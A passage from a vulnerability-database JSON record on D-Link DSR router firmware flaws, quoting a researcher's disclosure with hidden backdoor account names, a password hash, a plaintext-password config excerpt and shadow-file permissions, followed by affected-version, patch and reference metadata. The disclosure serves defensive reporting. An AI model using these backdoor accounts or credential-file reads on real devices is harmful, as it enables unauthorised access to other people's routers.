User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n  \u0026lt;/textarea\u0026gt;\n  [...]\n  \n  \n  \n3. Exposure: D-Link backdoor user:\n  \n  \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n  root:!:0:0:root:/root:/bin/sh\n  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n  nobody:x:0:0:nobody:/nonexistent:/bin/false\n  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n  That was the account I hacked before with my previous exploit: \n  http://www.exploit-db.com/papers/22930/\n  And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n  Instead of removing the backdoor, D-Link just created a new one. \n  \n* I verified this by showing the /etc/profile:\n  \n  # /etc/profile\n  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n  PATH=.:/pfrm2.0/bin:$PATH\n  CLISH_PATH=/etc/clish\n  export PATH LD_LIBRARY_PATH CLISH_PATH\n  # redirect all users except root to CLI\n  if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n  trap \"/bin/login\" SIGINT\n  trap \"\" SIGTSTP\n  /pfrm2.0/bin/cli\n  exit\n  fi\n  PS1=\u0027DSR-250N\u003e \u0027\n  \n  \n  \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. \n  Since this hash type supports at most 8 characters, users can log in by just \n  typing the first 8 letters of their passwords when using SSH or telnet. \n  \n* An effective password length limitation of 8 characters makes brute force \n  attacks on user accounts very feasible, even if the user chose a longer \n  password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n  /tmp/system.db is built on boot time, reveals that all user passwords are \n  stored in plain text. \n\n  Example:\n\n  [...]  \n  Users = {}\n  Users[1] = {}\n  Users[1][\"Capabilities\"] = \"\"\n  Users[1][\"DefaultUser\"] = \"1\"\n  Users[1][\"UserId\"] = \"1\"\n  Users[1][\"FirstName\"] = \"backdoor\"\n  Users[1][\"OID\"] = \"0\"\n  Users[1][\"GroupId\"] = \"1\"\n  Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n  Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n  Users[1][\"UserTimeOut\"] = \"10\"\n  Users[1][\"_ROWID_\"] = \"1\"\n  Users[1][\"LastName\"] = \"ssl\"\n  [...]\n  \n  \n  \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n  Pointless, since every process runs as root, no user separation is \n  done anyway. \n\n  DSR-250N\u003e ls -l -a /etc/shadow\n  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow\n  DSR-250N\u003e ps\n    PID USER       VSZ STAT COMMAND\n      1 root      2700 S    init\n      2 root         0 SW\u003c  [kthreadd]\n      3 root         0 SW\u003c  [ksoftirqd/0]\n      4 root         0 SW\u003c  [events/0]\n      5 root         0 SW\u003c  [khelper]\n      8 root         0 SW\u003c  [async/mgr]\n    111 root         0 SW\u003c  [kblockd/0]\n    120 root         0 SW\u003c  [khubd]\n    123 root         0 SW\u003c  [kseriod]\n    128 root         0 SW\u003c  [kslowd]\n    129 root         0 SW\u003c  [kslowd]\n    150 root         0 SW   [pdflush]\n    151 root         0 SW   [pdflush]\n    152 root         0 SW\u003c  [kswapd0]\n    200 root         0 SW\u003c  [aio/0]\n    210 root         0 SW\u003c  [nfsiod]\n    220 root         0 SW\u003c  [crypto/0]\n    230 root         0 SW\u003c  [cns3xxx_spi.0]\n    781 root         0 SW\u003c  [mtdblockd]\n    860 root         0 SW\u003c  [usbhid_resumer]\n    874 root         0 SW\u003c  [rpciod/0]\n    903 root         0 SWN  [jffs2_gcd_mtd4]\n    909 root         0 SWN  [jffs2_gcd_mtd5]\n    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n    999 root      1816 S \u003c  /pfrm2.0/udev/sbin/udevd --daemon\n   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db\n   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db\n   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login\n   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd\n   1141 root     37000 S    /pfrm2.0/bin/sshd\n   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db\n   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db\n   1560 root         0 SW\u003c  [key_timehandler]\n   1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n   1600 root      8036 S    rvgd /tmp/system.db\n   1612 root         0 SW   [cavium]\n   1621 root      8424 S    vpnKAd /tmp/system.db\n   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d\n   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d\n   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd\n   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n   1771 root      2680 S    /pfrm2.0/bin/statusD\n   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db\n   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db\n   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db\n   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db\n   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db\n   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db\n   2205 root      1904 S    /pfrm2.0/bin/fReset\n   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh\n   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100\n   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n   3355 root      1768 S    /pfrm2.0/bin/rt2860apd\n   3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n   5353 root      2704 S    -sh\n   7877 root      2568 S    sleep 60\n   7953 root      2568 S    sleep 60\n   8008 root      2704 R    ps\n  16749 root      2704 S    -sh\n  25690 root         0 SW\u003c  [RtmpCmdQTask]\n  25692 root         0 SW\u003c  [RtmpWscTask]\n  DSR-250N\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-5946",
        "trust": 3.5
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 1.7
      },
      {
        "db": "BID",
        "id": "64181",
        "trust": 1.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "trust": 0.7
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ]
  },
  "id": "VAR-201312-0198",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:08:58.452000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Services Routers",
        "trust": 0.8,
        "url": "http://www.dlink.com/us/en/business-solutions/security/services-routers"
      },
      {
        "title": "\u30eb\u30fc\u30bf\uff0f\u30d5\u30a1\u30a4\u30a2\u30a6\u30a9\u30fc\u30eb",
        "trust": 0.8,
        "url": "http://www.dlink-jp.com/router-firewall"
      },
      {
        "title": "Downloads",
        "trust": 0.8,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "title": "D-Link DSR Router Remote Any Command Execution Vulnerability Patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/41739"
      },
      {
        "title": "DSR-250N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47082"
      },
      {
        "title": "DSR-250_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47081"
      },
      {
        "title": "DSR-150N_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47080"
      },
      {
        "title": "DSR-150_A2_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47079"
      },
      {
        "title": "DSR-150_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47078"
      },
      {
        "title": "DSR-1000_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47085"
      },
      {
        "title": "DSR-500N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47084"
      },
      {
        "title": "DSR-500_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47083"
      },
      {
        "title": "DSR-1000N_A1_FW1",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=47086"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 1.7,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5946"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5946"
      },
      {
        "trust": 0.6,
        "url": "http://www.securityfocus.com/bid/64181"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.exploit-db.com/papers/22930/"
      },
      {
        "trust": 0.1,
        "url": "http://tsd.dlink.com.tw"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237"
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948"
      },
      {
        "db": "BID",
        "id": "64181"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "ident": null
      },
      {
        "db": "VULHUB",
        "id": "VHN-65948",
        "ident": null
      },
      {
        "db": "BID",
        "id": "64181",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5946",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-65948",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64181",
        "ident": null
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "ident": null
      },
      {
        "date": "2013-12-07T17:10:52",
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "date": "2013-12-19T04:24:51.930000",
        "db": "NVD",
        "id": "CVE-2013-5946",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-17T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15237",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-65948",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64181",
        "ident": null
      },
      {
        "date": "2013-12-20T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-005614",
        "ident": null
      },
      {
        "date": "2023-04-26T19:27:52.350000",
        "db": "NVD",
        "id": "CVE-2013-5946",
        "ident": null
      },
      {
        "date": "2023-04-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-320",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "plural  D-Link Vulnerability to execute arbitrary commands in firmware of router products",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-005614"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "operating system commend injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-320"
      }
    ],
    "trust": 0.6
  }
}

VAR-201312-0290

Vulnerability from variot - Updated: 2023-12-18 12:08

D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii. D-Link DSR is a wireless service router product. There are multiple information disclosure vulnerabilities in the D-Link DSR Router Series account credentials. Allows an attacker to access sensitive information. The information obtained may lead to further attacks. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0290",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b29"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b35"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-500n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b29"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b31"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b46"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b48"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b43"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b23"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b56"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b11"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b27"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b20"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b51"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b50"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b77"
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "d link",
        "version": "1.08b44"
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
